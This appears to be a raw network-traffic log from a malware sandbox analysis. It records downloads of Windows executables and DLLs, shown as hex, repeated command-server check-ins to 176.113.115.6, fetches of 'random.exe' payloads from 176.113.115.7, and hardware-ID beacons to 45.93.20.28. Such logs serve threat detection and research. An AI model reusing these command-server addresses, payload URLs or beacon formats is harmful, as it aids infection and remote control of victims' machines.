Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Mar 2025 15:28:26 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Sun, 23 Feb 2025 13:15:18 GMTETag: "6b400-62ecf03da2580"Accept-Ranges: bytesContent-Length: 439296Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d1 b6 42 53 95 d7 2c 00 95 d7 2c 00 95 d7 2c 00 81 bc 2f 01 98 d7 2c 00 81 bc 29 01 2f d7 2c 00 c7 a2 28 01 87 d7 2c 00 c7 a2 2f 01 83 d7 2c 00 c7 a2 29 01 cc d7 2c 00 a4 8b d1 00 97 d7 2c 00 81 bc 28 01 82 d7 2c 00 81 bc 2d 01 86 d7 2c 00 95 d7 2d 00 67 d7 2c 00 59 a2 25 01 94 d7 2c 00 59 a2 d3 00 94 d7 2c 00 59 a2 2e 01 94 d7 2c 00 52 69 63 68 95 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 23 01 bb 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 00 02 00 00 00 00 00 b7 9f 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 07 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 45 06 00 c8 00 00 00 00 d0 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 c4 45 00 00 d8 e1 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e3 05 00 18 00 00 00 10 e2 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 05 00 38 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ea f0 04 00 00 10 00 00 00 f2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 72 48 01 00 00 10 05 00 00 4a 01 00 00 f6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 6d 00 00 00 60 06 00 00 2c 00 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 d0 06 00 00 02 00 00 00 6c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c4 45 00 00 00 e0 06 00 00 46 00 00 00 6e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Mar 2025 15:30:34 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=86Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 02
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Mar 2025 15:30:35 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1011200Keep-Alive: timeout=5, max=85Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c1 15 b0 99 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 5a 0e 00 00 12 01 00 00 00 00 00 2a 79 0e 00 00 20 00 00 00 80 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 0f 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 78 0e 00 4f 00 00 00 00 80 0e 00 6c 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0f 00 0c 00 00 00 bc 78 0e 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 59 0e 00 00 20 00 00 00 5a 0e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 6c 0e 01 00 00 80 0e 00 00 10 01 00 00 5c 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 0f 00 00 02 00 00 00 6c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 79 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 00 7d 00 00 6c 41 00 00 01 00 00 00 54 00 00 06 6c be 00 00 50 ba 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 33 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 43 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 ad 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 c1 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cf 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 e1 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 15 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Mar 2025 15:30:41 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="dll";Content-Length: 242176Keep-Alive: timeout=5, max=86Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 00 10 0b 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 7d 00 59 00 79 00 3d 00 7b 00 58 00 78 00 3d 00 8a 72 93 00 00 70 04 6f 32 00 00 0a 8c 6f 00 00 01 28 33 00 00 0a 02 04 6f 32 00 00 0a 7d 05 00 00 04 2a 3a 02 03 73 01 00 00 06 04 28 02 00 00 06 2a 1e 17 80 06 00 00 04 2a 32 72 df 00 00 70 28 3b 00 00 0a 26 2a 56 72 a8 0f 00 70 80 07 00 00 04 72 a8 0f 00 70 80 08 00 00 04 2a 1e 02 28 1f 00 00 0a 2a 3e 02 fe 15 06 00 00 02 02 03 7d 09 00 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 28 45 00 00 0a 7d 09 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 47 00 00 0a 26 2a 3e 02 fe 15 07 00 00 02 02 03 7d 0e 00 00 04 2a aa 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00 01 28 44 00 00 0a 7d 0e 00 00 04 02 28 46 00 00 0a 28 45 00 00 0a 28 48 00 00 0a 26 2a 22 02 fe 15 08 00 00 02 2a 3e 02 fe 15 09 00 00 02 02 03 7d 18 00 00 04 2a 52 02 03 7d 20 00 00 04 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2a 1e 02 7b 20 00 00 04 2a 22 02 03 7d 21 00 00 04 2a 1e 02 7b 21 00 00 04 2a ea 02 03 7d 1f 00 00 04 02
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 01 Mar 2025 15:30:42 GMTServer: Apache/2.4.52 (Ubuntu)Content-Disposition: attachment; filename="soft";Content-Length: 1011200Keep-Alive: timeout=5, max=85Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 c1 15 b0 99 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 5a 0e 00 00 12 01 00 00 00 00 00 2a 79 0e 00 00 20 00 00 00 80 0e 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 0f 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d8 78 0e 00 4f 00 00 00 00 80 0e 00 6c 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 0f 00 0c 00 00 00 bc 78 0e 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 30 59 0e 00 00 20 00 00 00 5a 0e 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 6c 0e 01 00 00 80 0e 00 00 10 01 00 00 5c 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 0f 00 00 02 00 00 00 6c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 79 0e 00 00 00 00 00 48 00 00 00 02 00 05 00 00 7d 00 00 6c 41 00 00 01 00 00 00 54 00 00 06 6c be 00 00 50 ba 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 13 00 00 0a 2a 1e 02 28 13 00 00 0a 2a ae 7e 01 00 00 04 2d 1e 72 01 00 00 70 d0 03 00 00 02 28 14 00 00 0a 6f 15 00 00 0a 73 16 00 00 0a 80 01 00 00 04 7e 01 00 00 04 2a 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 6a 28 03 00 00 06 72 33 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 43 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 ad 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 c1 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 cf 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 e1 00 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 6a 28 03 00 00 06 72 15 01 00 70 7e 02 00 00 04 6f 17 00 00 0a 74 15 00 00 01 2a 1a 7e 03 00 00 04 2a 1e 02 28 18 00 00 0a 2a 56 73 0e 00 00 06 28 19 00 00 0a 74 04 00 00 02 80 03 00 00 04 2a 4e 02 28 1a 00 00 0a 02 28 1e 00 00 06 02 28 11 00 00

Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 36 42 35 38 41 38 30 42 34 45 46 41 38 45 34 39 32 32 44 43 33 31 34 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 44 42 34 32 38 37 31 42 34 35 42 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA706B58A80B4EFA8E4922DC31419B140BE1D46450FC9DDF642E3BDD70A7DB42871B45B82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B5
Source: global traffic	HTTP traffic detected: GET /files/fate/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 30 32 36 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10060260101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/bonus_max/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 30 32 37 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10060270101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/qqdoup/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 30 32 38 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10060280101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/martin2/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 30 32 39 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10060290101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /files/unique2/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 30 33 30 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10060300101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 30 33 31 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10060310101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 30 33 32 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10060320101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.93.20.28Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHIIIJDAAAAAAKECBFBHost: 45.93.20.28Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 44 30 38 36 45 42 46 37 43 38 34 36 35 38 35 34 32 32 34 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 72 75 6d 70 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 2d 2d 0d 0a Data Ascii: ------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="hwid"73D086EBF7C8465854224------IEHIIIJDAAAAAAKECBFBContent-Disposition: form-data; name="build"trump------IEHIIIJDAAAAAAKECBFB--
Source: global traffic	HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 30 33 33 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10060330101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: POST /Ni9kiput/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 176.113.115.6Content-Length: 32Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 36 30 33 34 30 31 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=10060340101&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /test/exe/random.exe HTTP/1.1Host: 176.113.115.7
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.93.20.28Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /85a1cacf11314eb8.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HIIDGCGCBFBAKFHIJDBAHost: 45.93.20.28Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 33 44 30 38 36 45 42 46 37 43 38 34 36 35 38 35 34 32 32 34 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 72 75 6d 70 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 44 47 43 47 43 42 46 42 41 4b 46 48 49 4a 44 42 41 2d 2d 0d 0a Data Ascii: ------HIIDGCGCBFBAKFHIJDBAContent-Disposition: form-data; name="hwid"73D086EBF7C8465854224------HIIDGCGCBFBAKFHIJDBAContent-Disposition: form-data; name="build"trump------HIIDGCGCBFBAKFHIJDBA--
